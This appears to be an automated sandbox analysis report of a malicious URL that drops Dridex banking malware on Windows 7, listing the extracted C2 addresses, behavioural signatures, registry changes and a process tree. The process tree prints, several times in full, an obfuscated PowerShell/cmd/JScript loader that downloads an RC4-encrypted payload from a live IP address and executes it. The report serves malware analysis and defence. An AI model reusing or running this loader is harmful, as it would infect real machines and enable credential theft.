Analysis
-
max time kernel
253s -
max time network
254s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
16-11-2020 11:25
Static task
static1
URLScan task
urlscan1
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Behavioral task
behavioral1
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Resource
win7v20201028
Behavioral task
behavioral2
Sample
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Resource
win7v20201028
General
-
Target
https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
Malware Config
Extracted
dridex
10111
194.150.118.7:443
49.212.179.180:3889
69.64.62.4:4443
Signatures
-
Processes:
resource yara_rule behavioral2/memory/780-62-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exewscript.exeflow pid process 19 1352 wscript.exe 20 1512 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
djadi.exepid process 780 djadi.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exepid process 1820 cmd.exe 1820 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
djadi.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA djadi.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 007eed3713bcd601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000dae278a3d11644856952b6a5a98c924839ec895d53b3b47b5b79445071da69f7000000000e80000000020000200000002765e156a02b525d9c4a285567059f662e567791f24bf12a934b7f48d1c5a04a900000001bbafb97fa28ff585e4cf1d903a40c0b7e802f09657fe4c7258ce7a80caae9ec8f96da9c5fee83a3ecfa6fb20a5f1d6fe5ab76cc24a4996251b3cba9e0eaa7d78454bf23f3ffcf4d27467b3c668fb010a96a24e71d826c86907462ebda4d9d8de4fcb1e0592b30739189f8aacd92670266bd2b4003d2745a3ea1e3664cc88741459242f3e319a507ae3eaee6406917f740000000d472dbc1ec27544e9a8b9d1629db1a2370e8d6c68a88d021cee64295cd72c2b56cc2a4ed8c09d5e9b4072b18bb2e7d30770d210cf76dcdc3919eef3e692351ae iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5ADFCC71-2806-11EB-9964-C611B4A1F110} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "312294308" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000cf1e2843ca566257223ef0d1fd9f9d99bb18c911119497c4201c413fc6b3a448000000000e80000000020000200000008c71929146512bf0817b10b860a1123882b03f54be1c97f4c1e7c0813fe833d3200000000ad320ccbc277f3321364ee3b986ff143296f634e91018f5f8c70aa076bda2e74000000050f21215b5bb34fafcc16f8cfd16d89e8dddac10219f22ed3ba2f168398ba49a61b4a4e5cce385a70564872e47b93a0defabf85a5312ab7b2a8015930f0f5719 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
PowerShell.exePowerShell.exepid process 1252 PowerShell.exe 748 PowerShell.exe 1252 PowerShell.exe 748 PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
PowerShell.exePowerShell.exedescription pid process Token: SeDebugPrivilege 1252 PowerShell.exe Token: SeDebugPrivilege 748 PowerShell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1772 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 1772 iexplore.exe 1772 iexplore.exe 844 IEXPLORE.EXE 844 IEXPLORE.EXE 1164 IEXPLORE.EXE 1164 IEXPLORE.EXE 1264 IEXPLORE.EXE 1264 IEXPLORE.EXE 1264 IEXPLORE.EXE 1264 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEPowerShell.execmd.exePowerShell.execmd.exewscript.execmd.exedescription pid process target process PID 1772 wrote to memory of 844 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 844 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 844 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 844 1772 iexplore.exe IEXPLORE.EXE PID 844 wrote to memory of 748 844 IEXPLORE.EXE PowerShell.exe PID 844 wrote to memory of 748 844 IEXPLORE.EXE PowerShell.exe PID 844 wrote to memory of 748 844 IEXPLORE.EXE PowerShell.exe PID 844 wrote to memory of 748 844 IEXPLORE.EXE PowerShell.exe PID 1772 wrote to memory of 1164 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1164 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1164 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1164 1772 iexplore.exe IEXPLORE.EXE PID 1164 wrote to memory of 1252 1164 IEXPLORE.EXE PowerShell.exe PID 1164 wrote to memory of 1252 1164 IEXPLORE.EXE PowerShell.exe PID 1164 wrote to memory of 1252 1164 IEXPLORE.EXE PowerShell.exe PID 1164 wrote to memory of 1252 1164 IEXPLORE.EXE PowerShell.exe PID 1772 wrote to memory of 1264 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1264 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1264 1772 iexplore.exe IEXPLORE.EXE PID 1772 wrote to memory of 1264 1772 iexplore.exe IEXPLORE.EXE PID 748 wrote to memory of 1604 748 PowerShell.exe cmd.exe PID 748 wrote to memory of 1604 748 PowerShell.exe cmd.exe PID 748 wrote to memory of 1604 748 PowerShell.exe cmd.exe PID 748 wrote to memory of 1604 748 PowerShell.exe cmd.exe PID 1604 wrote to memory of 1512 1604 cmd.exe wscript.exe PID 1604 wrote to memory of 1512 1604 cmd.exe wscript.exe PID 1604 wrote to memory of 1512 1604 cmd.exe wscript.exe PID 1604 wrote to memory of 1512 1604 cmd.exe wscript.exe PID 1252 wrote to memory of 1836 1252 PowerShell.exe cmd.exe PID 1252 wrote to memory of 1836 1252 PowerShell.exe cmd.exe PID 1252 wrote to memory of 1836 1252 PowerShell.exe cmd.exe PID 1252 wrote to memory of 1836 1252 PowerShell.exe cmd.exe PID 1836 wrote to memory of 1352 1836 cmd.exe wscript.exe PID 1836 wrote to memory of 1352 1836 cmd.exe wscript.exe PID 1836 wrote to memory of 1352 1836 cmd.exe wscript.exe PID 1836 wrote to memory of 1352 1836 cmd.exe wscript.exe PID 1512 wrote to memory of 1820 1512 wscript.exe cmd.exe PID 1512 wrote to memory of 1820 1512 wscript.exe cmd.exe PID 1512 wrote to memory of 1820 1512 wscript.exe cmd.exe PID 1512 wrote to memory of 1820 1512 wscript.exe cmd.exe PID 1820 wrote to memory of 780 1820 cmd.exe djadi.exe PID 1820 wrote to memory of 780 1820 cmd.exe djadi.exe PID 1820 wrote to memory of 780 1820 cmd.exe djadi.exe PID 1820 wrote to memory of 780 1820 cmd.exe djadi.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2&etwFDTh&bCbREhj=filly&VTZ=consignment&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL&HTOqRDUr=abettor&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w&yCi=accelerator&JEiQb=border&UVcGD=mustard&ceSzWJ=filly&Wajv=neighboring&YmcyIHZL=community&nkIl=difference&LIWRIRsPQ=disagree&MsVpBcv=mustard&NiLrfEXSQNzkxNTE= 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c djadi.exe6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\djadi.exedjadi.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:340994 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3&ihcvWpRrq&NKzW=irreverent&eHlPRdjuM=border&KCvwqAaL=disagree&bauGNAYyB=professional&CDXgqQgGI=abettor&XiPLJ=difference&KhpVstUR=neighboring&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT&vNO=callous&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA&queHTbi=consignment&ZYCNHy=filly&ZQwWEDouB=community&JfHK=disagree&xLnlKUhhWMzAzOTkx 15⤵
- Blocklisted process makes network request
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:209934 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
